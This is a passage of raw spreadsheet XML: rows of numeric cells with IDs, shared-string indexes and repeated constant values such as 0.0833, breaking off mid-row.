    <row r="34116" ht="15.75" customHeight="1">
      <c r="A34116" s="1">
        <v>22053.0</v>
      </c>
      <c r="B34116" s="2">
        <v>3.0416076E7</v>
      </c>
      <c r="C34116" s="2" t="s">
        <v>32847</v>
      </c>
      <c r="D34116" s="2">
        <v>1.0</v>
      </c>
      <c r="E34116" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34116" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34117" ht="15.75" customHeight="1">
      <c r="A34117" s="1">
        <v>22060.0</v>
      </c>
      <c r="B34117" s="2">
        <v>3.0513629E7</v>
      </c>
      <c r="C34117" s="2" t="s">
        <v>32848</v>
      </c>
      <c r="D34117" s="2">
        <v>1.0</v>
      </c>
      <c r="E34117" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34117" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34118" ht="15.75" customHeight="1">
      <c r="A34118" s="1">
        <v>22151.0</v>
      </c>
      <c r="B34118" s="2">
        <v>3.1274005E7</v>
      </c>
      <c r="C34118" s="2" t="s">
        <v>32849</v>
      </c>
      <c r="D34118" s="2">
        <v>1.0</v>
      </c>
      <c r="E34118" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34118" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34119" ht="15.75" customHeight="1">
      <c r="A34119" s="1">
        <v>22165.0</v>
      </c>
      <c r="B34119" s="2">
        <v>3.1506318E7</v>
      </c>
      <c r="C34119" s="2" t="s">
        <v>32850</v>
      </c>
      <c r="D34119" s="2">
        <v>1.0</v>
      </c>
      <c r="E34119" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34119" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34120" ht="15.75" customHeight="1">
      <c r="A34120" s="1">
        <v>22184.0</v>
      </c>
      <c r="B34120" s="2">
        <v>3.1725545E7</v>
      </c>
      <c r="C34120" s="2" t="s">
        <v>32814</v>
      </c>
      <c r="D34120" s="2">
        <v>1.0</v>
      </c>
      <c r="E34120" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34120" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34121" ht="15.75" customHeight="1">
      <c r="A34121" s="1">
        <v>22189.0</v>
      </c>
      <c r="B34121" s="2">
        <v>3.1758612E7</v>
      </c>
      <c r="C34121" s="2" t="s">
        <v>32851</v>
      </c>
      <c r="D34121" s="2">
        <v>1.0</v>
      </c>
      <c r="E34121" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34121" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34122" ht="15.75" customHeight="1">
      <c r="A34122" s="1">
        <v>22209.0</v>
      </c>
      <c r="B34122" s="2">
        <v>3.2138757E7</v>
      </c>
      <c r="C34122" s="2" t="s">
        <v>32852</v>
      </c>
      <c r="D34122" s="2">
        <v>1.0</v>
      </c>
      <c r="E34122" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34122" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34123" ht="15.75" customHeight="1">
      <c r="A34123" s="1">
        <v>22362.0</v>
      </c>
      <c r="B34123" s="2">
        <v>3.4815503E7</v>
      </c>
      <c r="C34123" s="2" t="s">
        <v>32853</v>
      </c>
      <c r="D34123" s="2">
        <v>1.0</v>
      </c>
      <c r="E34123" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34123" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34124" ht="15.75" customHeight="1">
      <c r="A34124" s="1">
        <v>22412.0</v>
      </c>
      <c r="B34124" s="2">
        <v>3.5997782E7</v>
      </c>
      <c r="C34124" s="2" t="s">
        <v>32854</v>
      </c>
      <c r="D34124" s="2">
        <v>1.0</v>
      </c>
      <c r="E34124" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34124" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34125" ht="15.75" customHeight="1">
      <c r="A34125" s="1">
        <v>22423.0</v>
      </c>
      <c r="B34125" s="2">
        <v>3.6107382E7</v>
      </c>
      <c r="C34125" s="2" t="s">
        <v>32855</v>
      </c>
      <c r="D34125" s="2">
        <v>1.0</v>
      </c>
      <c r="E34125" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34125" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34126" ht="15.75" customHeight="1">
      <c r="A34126" s="1">
        <v>22506.0</v>
      </c>
      <c r="B34126" s="2">
        <v>3.7395962E7</v>
      </c>
      <c r="C34126" s="2" t="s">
        <v>32856</v>
      </c>
      <c r="D34126" s="2">
        <v>1.0</v>
      </c>
      <c r="E34126" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34126" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34127" ht="15.75" customHeight="1">
      <c r="A34127" s="1">
        <v>22534.0</v>
      </c>
      <c r="B34127" s="2">
        <v>3.7919522E7</v>
      </c>
      <c r="C34127" s="2" t="s">
        <v>32857</v>
      </c>
      <c r="D34127" s="2">
        <v>1.0</v>
      </c>
      <c r="E34127" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34127" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34128" ht="15.75" customHeight="1">
      <c r="A34128" s="1">
        <v>22626.0</v>
      </c>
      <c r="B34128" s="2">
        <v>4.0419636E7</v>
      </c>
      <c r="C34128" s="2" t="s">
        <v>32858</v>
      </c>
      <c r="D34128" s="2">
        <v>1.0</v>
      </c>
      <c r="E34128" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34128" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34129" ht="15.75" customHeight="1">
      <c r="A34129" s="1">
        <v>22706.0</v>
      </c>
      <c r="B34129" s="2">
        <v>4.2781052E7</v>
      </c>
      <c r="C34129" s="2" t="s">
        <v>32859</v>
      </c>
      <c r="D34129" s="2">
        <v>1.0</v>
      </c>
      <c r="E34129" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34129" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34130" ht="15.75" customHeight="1">
      <c r="A34130" s="1">
        <v>22733.0</v>
      </c>
      <c r="B34130" s="2">
        <v>4.3973885E7</v>
      </c>
      <c r="C34130" s="2" t="s">
        <v>32860</v>
      </c>
      <c r="D34130" s="2">
        <v>1.0</v>
      </c>
      <c r="E34130" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34130" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34131" ht="15.75" customHeight="1">
      <c r="A34131" s="1">
        <v>22783.0</v>
      </c>
      <c r="B34131" s="2">
        <v>4.5250817E7</v>
      </c>
      <c r="C34131" s="2" t="s">
        <v>32861</v>
      </c>
      <c r="D34131" s="2">
        <v>1.0</v>
      </c>
      <c r="E34131" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34131" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34132" ht="15.75" customHeight="1">
      <c r="A34132" s="1">
        <v>22815.0</v>
      </c>
      <c r="B34132" s="2">
        <v>4.6177355E7</v>
      </c>
      <c r="C34132" s="2" t="s">
        <v>32862</v>
      </c>
      <c r="D34132" s="2">
        <v>1.0</v>
      </c>
      <c r="E34132" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34132" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34133" ht="15.75" customHeight="1">
      <c r="A34133" s="1">
        <v>22950.0</v>
      </c>
      <c r="B34133" s="2">
        <v>4889848.0</v>
      </c>
      <c r="C34133" s="2" t="s">
        <v>32863</v>
      </c>
      <c r="D34133" s="2">
        <v>1.0</v>
      </c>
      <c r="E34133" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34133" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34134" ht="15.75" customHeight="1">
      <c r="A34134" s="1">
        <v>22993.0</v>
      </c>
      <c r="B34134" s="2">
        <v>4944314.0</v>
      </c>
      <c r="C34134" s="2" t="s">
        <v>32864</v>
      </c>
      <c r="D34134" s="2">
        <v>1.0</v>
      </c>
      <c r="E34134" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34134" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34135" ht="15.75" customHeight="1">
      <c r="A34135" s="1">
        <v>23032.0</v>
      </c>
      <c r="B34135" s="2">
        <v>5006735.0</v>
      </c>
      <c r="C34135" s="2" t="s">
        <v>32865</v>
      </c>
      <c r="D34135" s="2">
        <v>1.0</v>
      </c>
      <c r="E34135" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34135" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34136" ht="15.75" customHeight="1">
      <c r="A34136" s="1">
        <v>23072.0</v>
      </c>
      <c r="B34136" s="2">
        <v>5.0477011E7</v>
      </c>
      <c r="C34136" s="2" t="s">
        <v>32866</v>
      </c>
      <c r="D34136" s="2">
        <v>1.0</v>
      </c>
      <c r="E34136" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34136" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34137" ht="15.75" customHeight="1">
      <c r="A34137" s="1">
        <v>23125.0</v>
      </c>
      <c r="B34137" s="2">
        <v>5132964.0</v>
      </c>
      <c r="C34137" s="2" t="s">
        <v>32867</v>
      </c>
      <c r="D34137" s="2">
        <v>1.0</v>
      </c>
      <c r="E34137" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34137" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34138" ht="15.75" customHeight="1">
      <c r="A34138" s="1">
        <v>23181.0</v>
      </c>
      <c r="B34138" s="2">
        <v>5221578.0</v>
      </c>
      <c r="C34138" s="2" t="s">
        <v>32868</v>
      </c>
      <c r="D34138" s="2">
        <v>1.0</v>
      </c>
      <c r="E34138" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34138" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34139" ht="15.75" customHeight="1">
      <c r="A34139" s="1">
        <v>23287.0</v>
      </c>
      <c r="B34139" s="2">
        <v>5378945.0</v>
      </c>
      <c r="C34139" s="2" t="s">
        <v>32869</v>
      </c>
      <c r="D34139" s="2">
        <v>1.0</v>
      </c>
      <c r="E34139" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34139" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34140" ht="15.75" customHeight="1">
      <c r="A34140" s="1">
        <v>23290.0</v>
      </c>
      <c r="B34140" s="2">
        <v>5.3854415E7</v>
      </c>
      <c r="C34140" s="2" t="s">
        <v>32870</v>
      </c>
      <c r="D34140" s="2">
        <v>1.0</v>
      </c>
      <c r="E34140" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34140" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34141" ht="15.75" customHeight="1">
      <c r="A34141" s="1">
        <v>23292.0</v>
      </c>
      <c r="B34141" s="2">
        <v>5386564.0</v>
      </c>
      <c r="C34141" s="2" t="s">
        <v>32871</v>
      </c>
      <c r="D34141" s="2">
        <v>1.0</v>
      </c>
      <c r="E34141" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34141" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34142" ht="15.75" customHeight="1">
      <c r="A34142" s="1">
        <v>23315.0</v>
      </c>
      <c r="B34142" s="2">
        <v>5423429.0</v>
      </c>
      <c r="C34142" s="2" t="s">
        <v>32872</v>
      </c>
      <c r="D34142" s="2">
        <v>1.0</v>
      </c>
      <c r="E34142" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34142" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34143" ht="15.75" customHeight="1">
      <c r="A34143" s="1">
        <v>23323.0</v>
      </c>
      <c r="B34143" s="2">
        <v>5.4447058E7</v>
      </c>
      <c r="C34143" s="2" t="s">
        <v>32873</v>
      </c>
      <c r="D34143" s="2">
        <v>1.0</v>
      </c>
      <c r="E34143" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34143" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34144" ht="15.75" customHeight="1">
      <c r="A34144" s="1">
        <v>23444.0</v>
      </c>
      <c r="B34144" s="2">
        <v>5.6702275E7</v>
      </c>
      <c r="C34144" s="2" t="s">
        <v>32874</v>
      </c>
      <c r="D34144" s="2">
        <v>1.0</v>
      </c>
      <c r="E34144" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34144" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34145" ht="15.75" customHeight="1">
      <c r="A34145" s="1">
        <v>23531.0</v>
      </c>
      <c r="B34145" s="2">
        <v>5918541.0</v>
      </c>
      <c r="C34145" s="2" t="s">
        <v>32875</v>
      </c>
      <c r="D34145" s="2">
        <v>1.0</v>
      </c>
      <c r="E34145" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34145" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34146" ht="15.75" customHeight="1">
      <c r="A34146" s="1">
        <v>23597.0</v>
      </c>
      <c r="B34146" s="2">
        <v>6389034.0</v>
      </c>
      <c r="C34146" s="2" t="s">
        <v>32876</v>
      </c>
      <c r="D34146" s="2">
        <v>1.0</v>
      </c>
      <c r="E34146" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34146" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34147" ht="15.75" customHeight="1">
      <c r="A34147" s="1">
        <v>23706.0</v>
      </c>
      <c r="B34147" s="2">
        <v>7162230.0</v>
      </c>
      <c r="C34147" s="2" t="s">
        <v>32877</v>
      </c>
      <c r="D34147" s="2">
        <v>1.0</v>
      </c>
      <c r="E34147" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34147" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34148" ht="15.75" customHeight="1">
      <c r="A34148" s="1">
        <v>23736.0</v>
      </c>
      <c r="B34148" s="2">
        <v>7316664.0</v>
      </c>
      <c r="C34148" s="2" t="s">
        <v>32878</v>
      </c>
      <c r="D34148" s="2">
        <v>1.0</v>
      </c>
      <c r="E34148" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34148" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34149" ht="15.75" customHeight="1">
      <c r="A34149" s="1">
        <v>23773.0</v>
      </c>
      <c r="B34149" s="2">
        <v>7565708.0</v>
      </c>
      <c r="C34149" s="2" t="s">
        <v>32879</v>
      </c>
      <c r="D34149" s="2">
        <v>1.0</v>
      </c>
      <c r="E34149" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34149" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34150" ht="15.75" customHeight="1">
      <c r="A34150" s="1">
        <v>23781.0</v>
      </c>
      <c r="B34150" s="2">
        <v>7643940.0</v>
      </c>
      <c r="C34150" s="2" t="s">
        <v>32880</v>
      </c>
      <c r="D34150" s="2">
        <v>1.0</v>
      </c>
      <c r="E34150" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34150" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34151" ht="15.75" customHeight="1">
      <c r="A34151" s="1">
        <v>23833.0</v>
      </c>
      <c r="B34151" s="2">
        <v>8080534.0</v>
      </c>
      <c r="C34151" s="2" t="s">
        <v>32881</v>
      </c>
      <c r="D34151" s="2">
        <v>1.0</v>
      </c>
      <c r="E34151" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34151" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34152" ht="15.75" customHeight="1">
      <c r="A34152" s="1">
        <v>23920.0</v>
      </c>
      <c r="B34152" s="2">
        <v>8548359.0</v>
      </c>
      <c r="C34152" s="2" t="s">
        <v>32882</v>
      </c>
      <c r="D34152" s="2">
        <v>1.0</v>
      </c>
      <c r="E34152" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34152" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34153" ht="15.75" customHeight="1">
      <c r="A34153" s="1">
        <v>23925.0</v>
      </c>
      <c r="B34153" s="2">
        <v>8594240.0</v>
      </c>
      <c r="C34153" s="2" t="s">
        <v>32883</v>
      </c>
      <c r="D34153" s="2">
        <v>1.0</v>
      </c>
      <c r="E34153" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34153" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34154" ht="15.75" customHeight="1">
      <c r="A34154" s="1">
        <v>24010.0</v>
      </c>
      <c r="B34154" s="2">
        <v>9288436.0</v>
      </c>
      <c r="C34154" s="2" t="s">
        <v>32884</v>
      </c>
      <c r="D34154" s="2">
        <v>1.0</v>
      </c>
      <c r="E34154" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34154" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34155" ht="15.75" customHeight="1">
      <c r="A34155" s="1">
        <v>24072.0</v>
      </c>
      <c r="B34155" s="2">
        <v>9671699.0</v>
      </c>
      <c r="C34155" s="2" t="s">
        <v>32885</v>
      </c>
      <c r="D34155" s="2">
        <v>1.0</v>
      </c>
      <c r="E34155" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34155" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34156" ht="15.75" customHeight="1">
      <c r="A34156" s="1">
        <v>24132.0</v>
      </c>
      <c r="B34156" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C34156" s="2" t="s">
        <v>32886</v>
      </c>
      <c r="D34156" s="2">
        <v>1.0</v>
      </c>
      <c r="E34156" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34156" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34157" ht="15.75" customHeight="1">
      <c r="A34157" s="1">
        <v>24135.0</v>
      </c>
      <c r="B34157" s="2">
        <v>1.004768E7</v>
      </c>
      <c r="C34157" s="2" t="s">
        <v>32887</v>
      </c>
      <c r="D34157" s="2">
        <v>1.0</v>
      </c>
      <c r="E34157" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34157" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34158" ht="15.75" customHeight="1">
      <c r="A34158" s="1">
        <v>24308.0</v>
      </c>
      <c r="B34158" s="2">
        <v>1.0581376E7</v>
      </c>
      <c r="C34158" s="2" t="s">
        <v>32888</v>
      </c>
      <c r="D34158" s="2">
        <v>1.0</v>
      </c>
      <c r="E34158" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34158" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34159" ht="15.75" customHeight="1">
      <c r="A34159" s="1">
        <v>24326.0</v>
      </c>
      <c r="B34159" s="2">
        <v>1.0664112E7</v>
      </c>
      <c r="C34159" s="2" t="s">
        <v>32889</v>
      </c>
      <c r="D34159" s="2">
        <v>1.0</v>
      </c>
      <c r="E34159" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34159" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34160" ht="15.75" customHeight="1">
      <c r="A34160" s="1">
        <v>24427.0</v>
      </c>
      <c r="B34160" s="2">
        <v>1.0851147E7</v>
      </c>
      <c r="C34160" s="2" t="s">
        <v>32890</v>
      </c>
      <c r="D34160" s="2">
        <v>1.0</v>
      </c>
      <c r="E34160" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34160" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34161" ht="15.75" customHeight="1">
      <c r="A34161" s="1">
        <v>24530.0</v>
      </c>
      <c r="B34161" s="2">
        <v>1.1194973E7</v>
      </c>
      <c r="C34161" s="2" t="s">
        <v>32809</v>
      </c>
      <c r="D34161" s="2">
        <v>1.0</v>
      </c>
      <c r="E34161" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34161" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34162" ht="15.75" customHeight="1">
      <c r="A34162" s="1">
        <v>24540.0</v>
      </c>
      <c r="B34162" s="2">
        <v>1.1214421E7</v>
      </c>
      <c r="C34162" s="2" t="s">
        <v>32891</v>
      </c>
      <c r="D34162" s="2">
        <v>1.0</v>
      </c>
      <c r="E34162" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34162" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34163" ht="15.75" customHeight="1">
      <c r="A34163" s="1">
        <v>24598.0</v>
      </c>
      <c r="B34163" s="2">
        <v>1.1411011E7</v>
      </c>
      <c r="C34163" s="2" t="s">
        <v>32892</v>
      </c>
      <c r="D34163" s="2">
        <v>1.0</v>
      </c>
      <c r="E34163" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34163" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34164" ht="15.75" customHeight="1">
      <c r="A34164" s="1">
        <v>24644.0</v>
      </c>
      <c r="B34164" s="2">
        <v>1.1484223E7</v>
      </c>
      <c r="C34164" s="2" t="s">
        <v>32893</v>
      </c>
      <c r="D34164" s="2">
        <v>1.0</v>
      </c>
      <c r="E34164" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34164" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34165" ht="15.75" customHeight="1">
      <c r="A34165" s="1">
        <v>24663.0</v>
      </c>
      <c r="B34165" s="2">
        <v>1.1533974E7</v>
      </c>
      <c r="C34165" s="2" t="s">
        <v>32894</v>
      </c>
      <c r="D34165" s="2">
        <v>1.0</v>
      </c>
      <c r="E34165" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34165" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34166" ht="15.75" customHeight="1">
      <c r="A34166" s="1">
        <v>24860.0</v>
      </c>
      <c r="B34166" s="2">
        <v>1.2207463E7</v>
      </c>
      <c r="C34166" s="5" t="s">
        <v>32895</v>
      </c>
      <c r="D34166" s="2">
        <v>1.0</v>
      </c>
      <c r="E34166" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34166" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34167" ht="15.75" customHeight="1">
      <c r="A34167" s="1">
        <v>24945.0</v>
      </c>
      <c r="B34167" s="2">
        <v>1.2512942E7</v>
      </c>
      <c r="C34167" s="2" t="s">
        <v>32896</v>
      </c>
      <c r="D34167" s="2">
        <v>1.0</v>
      </c>
      <c r="E34167" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34167" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34168" ht="15.75" customHeight="1">
      <c r="A34168" s="1">
        <v>24965.0</v>
      </c>
      <c r="B34168" s="2">
        <v>1.2601523E7</v>
      </c>
      <c r="C34168" s="2" t="s">
        <v>32896</v>
      </c>
      <c r="D34168" s="2">
        <v>1.0</v>
      </c>
      <c r="E34168" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34168" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34169" ht="15.75" customHeight="1">
      <c r="A34169" s="1">
        <v>24981.0</v>
      </c>
      <c r="B34169" s="2">
        <v>1.2676985E7</v>
      </c>
      <c r="C34169" s="2" t="s">
        <v>32897</v>
      </c>
      <c r="D34169" s="2">
        <v>1.0</v>
      </c>
      <c r="E34169" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34169" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34170" ht="15.75" customHeight="1">
      <c r="A34170" s="1">
        <v>25128.0</v>
      </c>
      <c r="B34170" s="2">
        <v>1.301877E7</v>
      </c>
      <c r="C34170" s="2" t="s">
        <v>32815</v>
      </c>
      <c r="D34170" s="2">
        <v>1.0</v>
      </c>
      <c r="E34170" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34170" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34171" ht="15.75" customHeight="1">
      <c r="A34171" s="1">
        <v>25201.0</v>
      </c>
      <c r="B34171" s="2">
        <v>1.3213953E7</v>
      </c>
      <c r="C34171" s="2" t="s">
        <v>32898</v>
      </c>
      <c r="D34171" s="2">
        <v>1.0</v>
      </c>
      <c r="E34171" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34171" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34172" ht="15.75" customHeight="1">
      <c r="A34172" s="1">
        <v>25239.0</v>
      </c>
      <c r="B34172" s="2">
        <v>1.3379944E7</v>
      </c>
      <c r="C34172" s="2" t="s">
        <v>32899</v>
      </c>
      <c r="D34172" s="2">
        <v>1.0</v>
      </c>
      <c r="E34172" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34172" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34173" ht="15.75" customHeight="1">
      <c r="A34173" s="1">
        <v>25358.0</v>
      </c>
      <c r="B34173" s="2">
        <v>1.358065E7</v>
      </c>
      <c r="C34173" s="2" t="s">
        <v>32900</v>
      </c>
      <c r="D34173" s="2">
        <v>1.0</v>
      </c>
      <c r="E34173" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34173" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34174" ht="15.75" customHeight="1">
      <c r="A34174" s="1">
        <v>25524.0</v>
      </c>
      <c r="B34174" s="2">
        <v>1.4220311E7</v>
      </c>
      <c r="C34174" s="2" t="s">
        <v>32901</v>
      </c>
      <c r="D34174" s="2">
        <v>1.0</v>
      </c>
      <c r="E34174" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34174" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34175" ht="15.75" customHeight="1">
      <c r="A34175" s="1">
        <v>25609.0</v>
      </c>
      <c r="B34175" s="2">
        <v>1.4396559E7</v>
      </c>
      <c r="C34175" s="2" t="s">
        <v>32902</v>
      </c>
      <c r="D34175" s="2">
        <v>1.0</v>
      </c>
      <c r="E34175" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34175" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34176" ht="15.75" customHeight="1">
      <c r="A34176" s="1">
        <v>25626.0</v>
      </c>
      <c r="B34176" s="2">
        <v>1.4460434E7</v>
      </c>
      <c r="C34176" s="2" t="s">
        <v>32903</v>
      </c>
      <c r="D34176" s="2">
        <v>1.0</v>
      </c>
      <c r="E34176" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34176" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34177" ht="15.75" customHeight="1">
      <c r="A34177" s="1">
        <v>25639.0</v>
      </c>
      <c r="B34177" s="2">
        <v>1.4497268E7</v>
      </c>
      <c r="C34177" s="2" t="s">
        <v>32904</v>
      </c>
      <c r="D34177" s="2">
        <v>1.0</v>
      </c>
      <c r="E34177" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34177" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34178" ht="15.75" customHeight="1">
      <c r="A34178" s="1">
        <v>25776.0</v>
      </c>
      <c r="B34178" s="2">
        <v>1.4652074E7</v>
      </c>
      <c r="C34178" s="2" t="s">
        <v>32905</v>
      </c>
      <c r="D34178" s="2">
        <v>1.0</v>
      </c>
      <c r="E34178" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34178" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34179" ht="15.75" customHeight="1">
      <c r="A34179" s="1">
        <v>26070.0</v>
      </c>
      <c r="B34179" s="2">
        <v>1.558243E7</v>
      </c>
      <c r="C34179" s="2" t="s">
        <v>32906</v>
      </c>
      <c r="D34179" s="2">
        <v>1.0</v>
      </c>
      <c r="E34179" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34179" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34180" ht="15.75" customHeight="1">
      <c r="A34180" s="1">
        <v>26086.0</v>
      </c>
      <c r="B34180" s="2">
        <v>1.5657866E7</v>
      </c>
      <c r="C34180" s="2" t="s">
        <v>32907</v>
      </c>
      <c r="D34180" s="2">
        <v>1.0</v>
      </c>
      <c r="E34180" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34180" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34181" ht="15.75" customHeight="1">
      <c r="A34181" s="1">
        <v>26282.0</v>
      </c>
      <c r="B34181" s="2">
        <v>1.6424642E7</v>
      </c>
      <c r="C34181" s="2" t="s">
        <v>32908</v>
      </c>
      <c r="D34181" s="2">
        <v>1.0</v>
      </c>
      <c r="E34181" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34181" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34182" ht="15.75" customHeight="1">
      <c r="A34182" s="1">
        <v>26445.0</v>
      </c>
      <c r="B34182" s="2">
        <v>1.7277948E7</v>
      </c>
      <c r="C34182" s="2" t="s">
        <v>32824</v>
      </c>
      <c r="D34182" s="2">
        <v>1.0</v>
      </c>
      <c r="E34182" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F34182" s="2">
        <v>0.08333333333333331</v>
      </c>
    </row>
    <row r="34183" ht="15.75" customHeight="1">
